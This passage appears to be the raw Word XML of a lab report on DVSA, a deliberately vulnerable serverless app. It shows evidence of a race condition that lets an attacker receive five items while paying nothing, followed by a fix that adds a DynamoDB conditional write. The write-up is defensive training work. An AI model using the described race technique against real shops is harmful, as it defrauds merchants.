        <w:t>This proves financial fraud: the attacker received 5 items while being charged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F50AC" w14:paraId="3E8545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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="29124F9F" w14:textId="771D03E2" w:rsidR="00CF50AC" w:rsidRDefault="0022213E">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022213E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F2AF288" wp14:editId="18C9249E">
                  <wp:extent cx="1279018" cy="2332800"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
                  <wp:docPr id="149044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46081" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1295273" cy="2362447"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19D2B3EB" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 5: DynamoDB console showing the order record with itemList=5, orderStatus=100, totalAmount=0 (the screenshot you already have)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D02EE" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evidence 2: Billing Response Showing Paid Amount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C764604" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The billing response from the API confirms the amount actually charged. This must be compared against the item count to prove the mismatch.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F50AC" w14:paraId="6E56BF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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3571EB25" w14:textId="4ED42861" w:rsidR="00CF50AC" w:rsidRDefault="0022213E">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022213E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1DE9E1" wp14:editId="62A23201">
                  <wp:extent cx="5943600" cy="2272030"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="144125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56787" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="2272030"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="110B3776" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 6: Terminal or browser showing the billing API response with the actual charged amount (e.g., amount: 0 or the original 1-item price)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B69EE" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Evidence 3: DVSA Website Order View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFBB4EA" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The DVSA website My Orders page shows the order with the final state, visually confirming the quantity vs. price mismatch.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F50AC" w14:paraId="740741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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="407F7062" w14:textId="42B19090" w:rsidR="00CF50AC" w:rsidRDefault="00BD44CE">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD44CE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3103C7BE" wp14:editId="79129F48">
                  <wp:extent cx="5943600" cy="1238250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="149651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12702" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId13"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1238250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5569E7C1" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 7: DVSA website My Orders page showing the exploited order with mismatched price and quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AECBFC9" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evidence 4: CloudWatch Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478678B5" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>CloudWatch Logs for /aws/lambda/DVSA-ORDER-BILLING and /aws/lambda/DVSA-ORDER-MANAGER show overlapping invocations with timestamps within milliseconds of each other, confirming that both requests were processed concurrently.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F50AC" w14:paraId="2FA984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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D2D5883" w14:textId="3D25DFFF" w:rsidR="00CF50AC" w:rsidRDefault="00C65A30">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C65A30">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="710F0BFB" wp14:editId="694B8DEC">
                  <wp:extent cx="5943600" cy="2680970"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="261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068" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="2680970"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="155EB660" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 8: CloudWatch Logs showing overlapping Lambda invocations for billing and update around the same timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D872EA7" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Together, this evidence proves that the billing Lambda processed payment based on a stale order state, while the update Lambda modified the order items concurrently. The final DynamoDB record shows the attacker received more items than they paid for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0FE01B" w14:textId="77777777" w:rsidR="00C65A30" w:rsidRDefault="00C65A30">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FED67B4" w14:textId="77777777" w:rsidR="00C65A30" w:rsidRDefault="00C65A30">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7615BC31" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Part 6) Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1A9D9" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The fix belongs in the Lambda functions handling order state transitions, specifically DVSA-ORDER-MANAGER (order-manager.js) and the DynamoDB interaction layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3DC205" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The mitigation strategy involves three complementary measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22493201" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. State Locking via DynamoDB Conditional Writes: </w:t>
      </w:r>
      <w:r>
        <w:t>When a billing request is received, the order status should be atomically updated to "billing-in-progress" using a DynamoDB ConditionExpression. This ensures only one billing request can proceed and no updates can modify the order while billing is active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D101153" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. Reject Updates During Billing: </w:t>
      </w:r>
      <w:r>
        <w:t>The order update handler must check the order status before applying changes. If the status is anything other than "pending" (100), the update must be rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C758980" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. Conditional Writes on Updates: </w:t>
      </w:r>
      <w:r>
        <w:t>Use DynamoDB ConditionExpression on the update operation itself, so even if the status check passes initially, the write only succeeds if the status hasn’t changed between the read and the write (preventing TOCTOU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6428C000" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 7) Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2770AE5A" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B861FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File: DVSA-ORDER-UPDATE / order_billing.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FEA76F" w14:textId="32817CA7" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Although the route in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
        <w:t>order-manager.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forwards billing requests to a backend Lambda, the actual billing logic is implemented in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
        <w:t>order_billing.py</w:t>
      </w:r>
      <w:r>
        <w:t>. This file retrieves the order, calculates the total, sends billing data to the payment service, and then updates the order record in DynamoDB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6CC26" w14:textId="2C437237" w:rsidR="00B861FB" w:rsidRPr="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability occurs because the function checks the order status before payment processing, but the final DynamoDB update does not enforce the order state atomically. Another request could modify the order between the initial status check and the final update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A60A5" w14:textId="1C6DCAA3" w:rsidR="00CF50AC" w:rsidRDefault="00000000" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Change 1: </w:t>
      </w:r>
      <w:r w:rsidR="00B861FB">
        <w:t>Add a DynamoDB conditional expression to the billing update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A095E22" w14:textId="45DE483E" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Before vulnerable code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF6DA97" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p3"/>
      </w:pPr>
      <w:r>
        <w:t>The function first checks the order status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79891F39" w14:textId="0F1EBD12" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p3"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>status = int(json.dumps(response["Item"]['orderStatus'], cls=DecimalEncoder))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>if status &lt; 120:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C60B1" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>Later, after payment succeeds, the function updates the order without a condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D65D1" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRPr="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B861FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>response = table.update_item(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B7F6C4" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRPr="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B861FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Key=key,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C829000" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRPr="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B861FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    UpdateExpression=update_expression,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DB1ED2" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRPr="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B861FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ExpressionAttributeValues=expression_attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CABE901" w14:textId="2C3A61CA" w:rsidR="00CF50AC" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B861FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F8C97" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This means the order can still be updated even if its status changed after the first status check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22E44F" w14:textId="71B55F86" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>After fixed code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D8763" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The final </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>table.update_item()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call was changed to include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>ConditionExpression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The update only succeeds if the order is still open, with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s2"/>
        </w:rPr>
        <w:t>orderStatus = 100</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766DF6C" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20962267" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    response = table.update_item(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2A009" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        Key=key,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B25235" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        UpdateExpression=update_expression,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6108AC65" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ConditionExpression="orderStatus = :open_status",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA832C" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ExpressionAttributeValues={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816F8B8" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            **expression_attributes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74505420" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            ":open_status": Decimal(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B8530D" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6256E420" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A87A0" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B1E377" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # SEND MESSAGE TO SQS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086FF3A5" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sqs = boto3.client('sqs')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2C93F" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res_sqs = sqs.send_message(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F5A98" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        QueueUrl=os.environ["SQS_URL"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53317E" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        MessageBody=json.dumps({"orderId": orderId, "userId": userId}),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319E720F" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        DelaySeconds=10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A87A3" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
